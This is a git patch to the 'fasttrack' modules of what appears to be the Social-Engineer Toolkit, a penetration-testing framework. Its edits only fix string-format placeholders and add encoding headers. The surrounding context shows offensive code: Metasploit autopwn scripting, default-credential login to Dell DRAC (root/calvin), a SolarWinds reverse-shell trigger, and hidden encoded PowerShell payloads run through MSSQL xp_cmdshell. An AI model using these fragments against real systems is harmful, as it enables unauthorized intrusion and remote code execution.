From 4c3814943db8e5a13833f42cd8b9a17e9be7ed29 Mon Sep 17 00:00:00 2001 From: Ryan Jarvis Date: Fri, 29 Jul 2016 15:15:09 -0700 Subject: [PATCH] {0} addition and encoding --- src/fasttrack/autopwn.py | 2 +- src/fasttrack/delldrac.py | 9 +++++---- src/fasttrack/exploits/__init__.py | 1 + src/fasttrack/exploits/solarwinds.py | 2 +- src/fasttrack/mssql.py | 16 ++++++++-------- src/fasttrack/psexec.py | 7 ++++--- src/fasttrack/ridenum.py | 4 ++-- src/fasttrack/sccm/__init__.py | 1 + 8 files changed, 23 insertions(+), 19 deletions(-) diff --git a/src/fasttrack/autopwn.py b/src/fasttrack/autopwn.py index 1a43a6ba0..905482ba2 100644 --- a/src/fasttrack/autopwn.py +++ b/src/fasttrack/autopwn.py @@ -28,7 +28,7 @@ def prep(database, ranges): core.print_status("Using the {0} sql driver for autopwn".format(database)) filewrite.write("db_driver {0}\r\n".format(database)) core.print_status("Autopwn will attack the following systems: {0}".format(ranges)) - filewrite.write("db_nmap {}\r\n".format(ranges)) + filewrite.write("db_nmap {0}\r\n".format(ranges)) filewrite.write("db_autopwn -p -t -e -r\r\n") filewrite.write("jobs -K\r\n") filewrite.write("sessions -l\r\n") diff --git a/src/fasttrack/delldrac.py b/src/fasttrack/delldrac.py index 42340ca9f..b8e34908a 100644 --- a/src/fasttrack/delldrac.py +++ b/src/fasttrack/delldrac.py @@ -1,4 +1,5 @@ #!/usr/bin/env python +# coding=utf-8 ########################################### # @@ -91,7 +92,7 @@ def login_drac(ipaddr_single): "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", - "Referer": "https://{}/Applications/dellUI/login.htm".format(ipaddr_single), + "Referer": "https://{0}/Applications/dellUI/login.htm".format(ipaddr_single), "Content-Length": 63, "Cookie": "test=1; SessionLang=EN", "Pragma": "no-cache", @@ -145,7 +146,7 @@ def login_chassis(ipaddr_single): "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", - "Referer": "https://{}/cgi-bin/webcgi/login".format(ipaddr_single), + "Referer": "https://{0}/cgi-bin/webcgi/login".format(ipaddr_single), "Content-Length": 78} # request the page @@ -159,7 +160,7 @@ def login_chassis(ipaddr_single): pass # login failed # to many people logged in at a given time if 'Connection refused, maximum sessions already in use.' in data: - print(("{}[!]{} There are to many people logged but un: root and pw: calvin are legit on IP: {}".format(bcolors.YELLOW, + print(("{0}[!]{1} There are to many people logged but un: root and pw: calvin are legit on IP: {2}".format(bcolors.YELLOW, bcolors.ENDC, ipaddr_single))) global global_check3 @@ -167,7 +168,7 @@ def login_chassis(ipaddr_single): # successful guess of passwords if "/cgi-bin/webcgi/index" in data: - print("{}[*]{} Dell Chassis Compromised! username: root password: calvin for IP address: ".format(bcolors.GREEN, + print("{0}[*]{1} Dell Chassis Compromised! username: root password: calvin for IP address: {2}".format(bcolors.GREEN, bcolors.ENDC, ipaddr_single)) global global_check4 diff --git a/src/fasttrack/exploits/__init__.py b/src/fasttrack/exploits/__init__.py index e69de29bb..9bad5790a 100644 --- a/src/fasttrack/exploits/__init__.py +++ b/src/fasttrack/exploits/__init__.py @@ -0,0 +1 @@ +# coding=utf-8 diff --git a/src/fasttrack/exploits/solarwinds.py b/src/fasttrack/exploits/solarwinds.py index 2b59aa50f..b41a2f14f 100644 --- a/src/fasttrack/exploits/solarwinds.py +++ b/src/fasttrack/exploits/solarwinds.py @@ -128,7 +128,7 @@ print("[*] Triggering shell") post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password}) opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode()) opener.open("http://{0}:9000/{1}".format(rhost, filename)) -print("[*] Check your shell on {} {}\n".format(lhost, lport)) +print("[*] Check your shell on {0} {1}\n".format(lhost, lport)) # 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 # 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100 diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index a0fd1b3cf..56b696f11 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") msf_path = core.meta_path() - child2 = pexpect.spawn("{}-r {}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), + child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), os.path.join(core.setdir, "meta_config"))) # random executable name @@ -237,7 +237,7 @@ def deploy_hex2binary(ipaddr, port, username, password): if not port: port = "443" - core.update_options("PORT={}".format(port)) + core.update_options("PORT={0}".format(port)) core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") @@ -257,9 +257,9 @@ def deploy_hex2binary(ipaddr, port, username, password): with open(os.path.join(core.setdir, "x86.powershell")) as x86: x86 = x86.read() - x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86) + x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) core.print_status("If you want the powershell commands and attack, " - "they are exported to {}".format(os.path.join(core.setdir, "reports/powershell"))) + "they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: filewrite.write(x86) @@ -286,7 +286,7 @@ def deploy_hex2binary(ipaddr, port, username, password): import pexpect core.print_status("Starting the Metasploit listener...") - child2 = pexpect.spawn("{} -r {}".format(os.path.join(msf_path, "msfconsole"), + child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "reports/powershell/powershell.rc"))) core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Be patient, Metaploit takes a little bit to start...") @@ -308,7 +308,7 @@ def deploy_hex2binary(ipaddr, port, username, password): # read in the file 900 bytes at a time with open(os.path.join(core.setdir, 'payload.hex')) as fileopen: core.print_status("Dropping initial begin certificate header...") - conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {}.crt'".format(random_exe)) + conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) for data in fileopen.read(900).rstrip(): if not data: continue @@ -356,7 +356,7 @@ def deploy_hex2binary(ipaddr, port, username, password): # we append more commands if option 1 is used if option == "1": core.print_status("Triggering the powershell injection payload... ") - sql_command = ("exec master..xp_cmdshell '{}'".format(powershell_command)) + sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command)) thread.start_new_thread(conn.execute_query, (sql_command,)) # using the old method @@ -415,7 +415,7 @@ def cmdshell(ipaddr, port, username, password, option): # if the command isnt empty elif cmd: # execute the command - mssql.sql_query("exec master..xp_cmdshell '{}'".format(cmd)) + mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd)) # print the rest of the data mssql.printReplies() mssql.colMeta[0]['TypeData'] = 80 * 2 diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index 7e69cb4ae..08a6e7074 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -1,3 +1,4 @@ +# coding=utf-8 ############################################# # # Main SET module for psexec @@ -84,7 +85,7 @@ try: with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: x86 = fileopen.read() - x86 = "powershell -nop -window hidden -noni -EncodedCommand {}".format(x86) + x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: filewrite.write(x86) @@ -112,8 +113,8 @@ try: # launch metasploit below core.print_status("Launching Metasploit.. This may take a few seconds.") - subprocess.Popen("{} -r {}".format(os.path.join(core.meta_path(), "msfconsole"), - os.path.join(core.setdir, "reports/powershell/powershell.rc")), + subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"), + os.path.join(core.setdir, "reports/powershell/powershell.rc")), shell=True).wait() # handle exceptions diff --git a/src/fasttrack/ridenum.py b/src/fasttrack/ridenum.py index 37a693ba6..24ade8f19 100755 --- a/src/fasttrack/ridenum.py +++ b/src/fasttrack/ridenum.py @@ -187,7 +187,7 @@ try: sid = check_user(ip, account) # if its false then cycle threw if not sid: - print("[!] Failed using account name: {}...Attempting another.".format(account)) + print("[!] Failed using account name: {0}...Attempting another.".format(account)) else: # success! Break out of the loop print("[*] Successfully enumerated SID account.. Moving on to extract via RID.\n") @@ -220,7 +220,7 @@ try: if sid_names: for name in sid_names: # print the sid - print("Account name: {}".format(name)) + print("Account name: {0}".format(name)) # write the file out filewrite.write(name + "\n") diff --git a/src/fasttrack/sccm/__init__.py b/src/fasttrack/sccm/__init__.py index e69de29bb..9bad5790a 100644 --- a/src/fasttrack/sccm/__init__.py +++ b/src/fasttrack/sccm/__init__.py @@ -0,0 +1 @@ +# coding=utf-8